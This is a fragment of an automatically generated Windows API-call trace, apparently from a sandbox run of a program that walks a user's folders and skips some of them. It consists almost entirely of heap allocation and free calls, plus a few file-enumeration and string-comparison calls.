[0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.961] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0073.962] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.963] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x10, dwReserved1=0x657690, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 1 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.963] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.965] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0073.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.966] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.966] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.966] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.966] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.966] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c10 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bc0 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2b8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b858 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ca0 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c30 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0073.967] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.967] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.967] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0073.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.968] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.969] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c80 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690ba0 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.969] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b60 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bd0 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c10 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690ca0 [0073.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2d0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3d8 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, 